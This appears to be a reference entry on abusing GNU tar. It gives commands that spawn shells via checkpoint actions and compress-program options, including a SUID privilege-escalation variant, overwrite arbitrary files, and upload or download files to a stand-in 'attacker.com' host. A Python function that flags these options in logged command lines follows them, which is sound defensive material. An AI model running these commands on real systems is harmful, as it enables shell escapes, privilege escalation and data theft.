tar
Download
The attacker box must have the `rmt` utility installed.
tar xvf user@attacker.com:/path/to/input-file.tar --rsh-command=/bin/ssh
File Read
The file is read then passed to the specified command (e.g., `tar xO`) via standard input.
tar cf /dev/stdout /path/to/input-file -I 'tar xO'
File Write
The archive can also be prepared offline then uploaded to the target.
echo DATA >/path/to/temp-file
tar cf /path/to/temp-file.tar /path/to/temp-file
tar Pxf /path/to/temp-file.tar --xform s@.*@/path/to/output-file@
Shell
tar cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
tar xf /dev/null -I '/bin/sh -c "/bin/sh 0<&2 1>&2"'
SUID override:
tar xf /dev/null -I '/bin/sh -c "/bin/sh 0<&2 1>&2"'
The archive can also be prepared offline then uploaded to the target.
echo '/bin/sh 0<&1' >/path/to/temp-file
tar cf /path/to/temp-file.tar /path/to/temp-file
tar xf /path/to/temp-file.tar --to-command /bin/sh
Upload
The attacker box must have the `rmt` utility installed.
tar cvf user@attacker.com:/path/to/output-file /path/to/input-file --rsh-command=/bin/ssh
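Detection
The options used on this page can be flagged in logged tar command lines (for example from process-creation or auditd records). The check below is an added example, not part of the original page; `audit_tar`, `is_abbrev`, the finding labels and the minimum abbreviation lengths are assumptions, and the matching is heuristic.

```python
import re
import shlex

# (finding, GNU tar long option, shortest abbreviation matched here).
# GNU tar accepts unambiguous abbreviations of long options; the minimum
# lengths are assumptions, set low so the check over-matches.
LONG_RULES = [
    ("exec via checkpoint action", "checkpoint-action", 12),
    ("member piped to command", "to-command", 4),
    ("external compress program", "use-compress-program", 2),
    ("custom remote shell", "rsh-command", 2),
]
REMOTE = re.compile(r"^(?:[\w.-]+@)?[\w.-]+:/")  # [user@]host:/path


def is_abbrev(name, full, min_len=2):
    return len(name) >= min_len and full.startswith(name)


def audit_tar(cmdline):
    """Return sorted findings for one logged tar command line."""
    argv = shlex.split(cmdline)
    if not argv or argv[0].rsplit("/", 1)[-1] != "tar":
        return []
    args, found = argv[1:], set()
    # Short flags: old-style first word ("Pxf") and dash clusters ("-xPf").
    shorts = "".join(a.lstrip("-") for i, a in enumerate(args)
                     if (i == 0 and not a.startswith("-"))
                     or re.fullmatch(r"-[A-Za-z]+", a))
    if "I" in shorts:
        found.add("external compress program")
    absolute = "P" in shorts
    transform = False
    for i, a in enumerate(args):
        if a.startswith("--"):
            name, _, value = a[2:].partition("=")
            value = value or (args[i + 1] if i + 1 < len(args) else "")
            for label, full, min_len in LONG_RULES:
                if is_abbrev(name, full, min_len) and (
                        full != "checkpoint-action" or value.startswith("exec=")):
                    found.add(label)
            absolute |= is_abbrev(name, "absolute-names")
            transform |= is_abbrev(name, "transform") or is_abbrev(name, "xform")
        target = a.split("=", 1)[1] if a.startswith("--file=") else a
        if REMOTE.match(target) and "--force-local" not in args:
            found.add("remote archive")
    if absolute and transform:
        found.add("absolute-path rename on extract")
    return sorted(found)
```

An empty list means none of the options above were seen; a routine `--checkpoint-action=dot` progress indicator is deliberately not reported.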